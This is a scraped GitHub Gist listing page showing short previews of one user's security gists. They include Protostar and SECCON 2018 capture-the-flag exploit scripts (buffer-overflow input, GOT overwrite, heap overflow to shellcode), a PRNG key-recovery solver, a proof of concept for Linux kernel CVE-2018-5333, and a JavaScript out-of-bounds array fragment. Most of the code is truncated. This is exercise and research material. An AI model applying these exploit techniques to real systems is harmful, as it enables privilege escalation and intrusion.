William Bowling wbowling
wbowling
/ 0_reuse_code.js
Last active
April 20, 2021 21:43
Here are some things you can do with Gists in GistBox.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Use Gists to store code you would like to remember later on | |
| console.log(window); // log the "window" object to the console |
wbowling
/ stack0_wrapper.sh
Created
July 16, 2017 01:48
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| ulimit -c 0 | |
| export LIBC_FATAL_STDERR_=1 | |
| python -c 'print "\xcc\x84\x04\x08"*16 + "\x00\x03\x02\x01" + "DDDD"' > input.bin | |
| output="" | |
| COUNTER=0 | |
| while [[ ! $output =~ "modified" ]]; do | |
| MOD=$(( $COUNTER % 1000 )) |
wbowling
/ mission009.c
Created
July 20, 2017 14:45
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <stdlib.h> | |
| int main() { | |
| // char *pass = "THE SECRET HAS BEEN REMOVED LOL"; | |
| char *pass = "\x9a\x60\x76\x14\x8b\x36\x5a\x10\x2b\x91\xc4\x6c\xab\x27\x92\x99\xf8\x6a\xec\x5d\x32\x20\x3d\x61\x8f\xc7\xfb\xdd\x02\x72\xbf"; | |
| char key[31]; | |
| char out[31]; | |
| // 2017-07-16 to 2017-07-20 |
wbowling
/ mission009.py
Created
July 21, 2017 05:30
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import string | |
| def srand(s): | |
| global seed | |
| seed = s | |
| # microsoft c runtime implementation | |
| def rand(): | |
| global seed |
wbowling
/ format0.py
Created
November 18, 2017 13:12
https://exploit-exercises.com/protostar/format0/ with modern gcc and aslr https://asciinema.org/a/148133
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python2 | |
| """ | |
| Overwrite the GOT entry for __stack_chk_fail with 0x40061a so we jump there instead. | |
| The address can be passed in via argv, we cant use nulls but we can use blank strings instead. | |
| As the argv location is semi random, it takes around 500 iterations which is pretty reasonable for 64bit | |
| """ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| def srand(s): | |
| global seed | |
| seed = s | |
| # microsoft c runtime implementation | |
| def rand(): | |
| global seed | |
| seed = (seed * 214013 + 2531011) % 2**64 |
wbowling
/ internet_of_seat.py
Last active
November 2, 2018 09:03
SECCON 2018 internet_of_seat - https://score-quals.seccon.jp/challenges#internet_of_seat
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python2 | |
| # pylint: skip-file | |
| """ | |
| When performing a chunked transfer, realloc doesnt take into account the size of the headers allowing an overflow. | |
| As the initial heap (0x100) is located inline we can overwrite the current heap location. | |
| * overwrite __malloc_heap to point to our fake heap | |
| * our fake heap size is huge so that memory os returned near the GOT | |
| * overwrite memchr got with shellcode address | |
| * win |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| FROM ubuntu | |
| RUN apt-get update -y && apt-get install -y gcc | |
| RUN ( \ | |
| echo '#define _GNU_SOURCE'; \ | |
| echo '#include <fcntl.h>'; \ | |
| echo '#include <stdio.h>'; \ | |
| echo '#include <unistd.h>'; \ | |
| \ | |
| echo 'char *getenv(const char *__name) {'; \ |
wbowling
/ cve-2018-5333-poc.c
Created
March 9, 2019 01:26
Example of using CVE-2019-9213 to make previous kernel bugs exploitable
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // 4.4.0-116-generic #140-Ubuntu SMP | |
| #define _GNU_SOURCE | |
| #include <err.h> | |
| #include <fcntl.h> | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <sys/mman.h> | |
| #include <unistd.h> | |
| #include <stdio.h> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| let oob_arr = [1.1, 0x61616161, 3.3]; | |
| function getSetValue(i, v) { | |
| if (v) { | |
| oob_arr[i] = v; | |
| } else { | |
| return oob_arr[i]; | |
| } | |
| } |
OlderNewer